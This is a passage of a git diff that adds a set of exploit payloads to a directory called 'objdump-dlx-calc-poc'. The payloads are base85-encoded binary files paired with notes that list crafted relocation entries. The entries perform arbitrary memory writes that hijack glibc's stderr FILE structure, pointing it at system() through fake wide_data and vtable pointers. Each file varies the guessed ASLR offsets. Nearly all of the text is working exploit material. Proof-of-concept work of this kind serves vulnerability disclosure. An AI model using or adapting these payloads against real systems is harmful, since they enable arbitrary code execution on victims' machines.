+flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..050c5e949c58bc3ace505698c91cb102d9f0cda6 GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZA=s6zb%AC7CEo5y*OJ~}Y7_F8+Lotep=p9{;Mtb~PVSZlu-#{~P<%T0Of z7}7{Z-WL@l_5eEzBx*o1>$;b9piOuSNC{p6Y0(=%hCFuzWCeM?cENv~f_Fd%(LMq4 zf~P>IeD@1@WwUk;=%SwN0J=rL1`49@0Y%Ykz-#J%x_}y^Lp^UWCk4~GBaidR0WUorfj4gV6k+-rEBD~x4? z{HsqRzWRjgNoWP_K$oGXpx;4HL(f3ZLceE9(#$Iw6dj5dMUSFM(WPip^f~l7Qinc= zK8NqG)T|yiQQE9-9BqH!J=m(FbXcuD;rhpZbA1CP-8}ShCy0VQ{trlx$qe7QynN}Y zaD;K1LcAYm$@xa25$1|i*#DRhG8aUdQpdYzVun-tLU=GN*0Rn?+Bn(jo?m)%Jm3Tw Z_7^VSywG35-z`h>QJ43Oxkv8r{Q=$CfT92Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..739c8e2 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..05ff64425110398d125c38f83e640d443d6daf1f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PdK05o6SdU}E)*&ViF0GsQc8tT6)GsW5bUBT#vc+jI1%isuh5rp zrM`nptv-M+P!#GLba8vW`{#8Q;?jYc^PTgZ`(z`ictp7Z74|=7!psFxrquE8nV8{}z7QS`i?ytCk`_+3y6>0X91A%? ahP}k)n;!;C^t)wAKIrnE@#%pFd;bsJ+km0~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..ec4714e --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..06666223aa853f25e2c88c654b1c1be5a9cae54f GIT binary patch literal 1280 zcmd5*+e#Zz6kU^v#>Bg6)2f9&C|D3i&m`WEVyUzWEm-hD&<8OzUN9QTiJ(vZLVv<1 z?LYYF?F0M*71}@O!?^ZbGUItDee8iVYp=D}?3~%z=j7AZ&sNGpb6KmWj1z+W=;uoQ z^Bpp1ZF>K!AhiqFSs+yf(pk^DssSy+Z-7?8TOcF)0nkR?{s3eJ`F%OTU)+Mffexa5 z26PIZ16}go51`v-?RKDtdb$JX75xtA6MYxRi(Um@P`~a0UW$GL6hyxTUWvX4yiNtJ z>km6P5aQrpJIZ2-|Ai;xNAU#oPT@>GnYi!QpfKzv5i~iLU_0=*0L^0TDUptzF%f@G~@(X Z_BTG({4jV#zgv`Ktjm4I`Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..84c8d98 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..795cdeecc9b3852ed9fff02a778fa72df9171e6f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Tez(dZ{XtgeD^20nMLWc12gA4=R5by%;cM|uin14VitPC`uL4;M6hqY z+@iNWM+(WF_rD5ab-+#ou?7%NyY5vJNC^p`{TB@Xyx}i3*RP}JD;xe5!@pJ)cfbC+;eTWJH_7E*!~3i< zmJ#yzKJD=j16(gaD`*G01ic8o1icJhhOR)rU`o==D;g9XiWWtWqDj%EXjAk#^f^+8 zK8HSs@2}XZowZQht?iudeL6V$+(hxD))?UW%VBGK2SwdF@o_(hf<68VNRP=3-?_Ye z>8Wspaf(8;A1ma1BfSyka#Yy=co}3ai87^*chAHjPU#Eb!LV4%`bm=DWUG6A>CHmG b2{P<=T(-Q>U&7xlNwTlYd&X*?`+NTbW9omR literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..6932c59 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..47f529fa79c81d633402a83fc007e97b83963d51 GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Te)#e8@RYV-~CB$W>LEAz|8s1`Of_^Gx_H0tGBPMn1$Z3K7L~y5$szp zx9F|UkwUWP{jY*p9kA0ttO3N+u6xx462jX+Qm_N0L_Y?G$VYB~v>?wnEO^H$_#4O& z?F(R3@H_B8zB>oTY}OtD#;M0Mz=Y^sAS-$u$cf$n9#a1`4m=XQ4NQvO0j5OX0H$O9 z)#Za5oC$FDuQ$qKk^hA|K+?j!!3;h!}8 zc_aVW$UiaiPmTOsbAd{K{{_Q8Z}>~i_3P;Q%7%Z%@UK`*O>(){@II@I zWrX~_Pka2s0M`r93fh4#K`%ltK`%p>p)1fYn36Q}iUvi8qD9f8Xi{`3+7x{beU8+j z&!NxZ`zy9;XDt+WYdfcVpAL>bH&HyPH3qo;a@gA5K~c9(eB2MBV2}R-(ql5icP=kq zdMX@YoT3oz#|k;$NN92NFIUIv*!m+*H>lI-j9p0V2J{@(upW;B1J literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..6fe7aff --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d912cc46a01fdb57185e17b00c033d60c17bfbb2 GIT binary patch literal 1280 zcmd5*%}QHA7(F*P8e`O^rdqWH7YY@G)Vc8&DGE{*DnxK0=t2ypRg5NNBG^@5!I$XD z_8naM_W*eTQP4MVaeKb|libWgx^!UXeCK@Uewmqk^Xu!{vK6z?7}nNr#u34O@N$#h zI)((=8{StH#0~*F3B*c3Jn6buWuQ&?4bU!l3nWCZ03GD1dmt&u^K}Y7atb~HT}1mF z=ob6~^vHK-z#E&jQ$U(}ybE|MdL8H${Se5AUIN}xzfJ>vqTc}hqTd4VMPCI5V*b?) z1~)hq;D;A)l*Jk{L=K94hw@&xLme`b&m?#qfV4mwOHGGtXE? z$Txi2;F~R6Pe3bZ2Ra8m2|Wcp4Lt)r3q8k_q?uPVC^{4^iXKIiqD#@H=yT|Eqz-)! zeGcDWwpKi?A-h*Boc!21IR0KnwpuK;aQ*YBwp&0}*Q!452T`!c{{iVSnc+K^moGgP zjxbJ8i1y9&myT Zd!5U+7y3*1yE#cVb$QSD(&YZ${{dz;f1>~Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..92b2353 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..98a9e31d780a1dbd2586b3370de7ed3e84df84ab GIT binary patch literal 1280 zcmd5*%St0b6g{0zjL|qg;w$5TixCurXmxZ{L=;6wa6n-e12YRzj1P=PtO&aD7yOA? zssG^8*9Z6oGlKqsi}u`prLBd`atf-?J?EajslK^&I{$6KN?3@N_47C5m|#D8xe@O< zfHdkN?|&5}b^$vBB+5WC*rAn%<4%{FT{0xi^&S)f()2cS*#T_7iV8EB_|+X8fmeg|}leh+ksz6f+D{MO}z z4t@-<=iQF7SnPk{$@o!x!Gi0$#AKV#lZ@j$jfcL=SiZsVHyM7O8!s_`&hU2{{=AX@ zWaN8|{AVNIe=sD+jm|%4_=gOCu`>H7?jJM!lZJnK*()E_pELYl4gV6k^fm0~GGkdG z|L)U>|9HdoFtmbppo`EW(4){_pvR!cp(mJjb-X?k>$znvga^xFE$fOT#m!Oo{4$$^0Vl|^ YSNQnlh5jS_-J&FGy4+_>)wqB5SCqMbq5uE@ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..653f33e --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..08b387c203f0286d10673da49263b60bac640f8a GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZAwC<^rtd^oOsZXV}B`sl#S+H37~c4j7fel9G3vJw`eVXggU924wYFE{0_ zV@M+vd0$kJ*aPe=kf;I4tm|IZfi~eSASHMOq(yH48S>l>kQLmF0ZvnlcUjcohF9Q7u|LO*U z8ypO9=-C@(vDp8@o$*loz=G?##ALzeNyc%W#`Wk~EZ=VU^M;@M#(m6RH2l4Wf56DU zG4jJke#FSXZA{2^qy3K?{t3fhu2=rX&o^WEKN$XxD_;4ie#P*AHvCKEa1ogfPK_&*>$CNq5J^75sp z!V$)43h{oNCFdK7Mwly7VgF-3$XpO*N*(W>i5X7m3*o`ASj##mY2#$8dw%K7@qiO# Z*k8DO^Fn_Kf43~jM_t}C<{r7f_XpdLfS~{Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..a70a66f --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 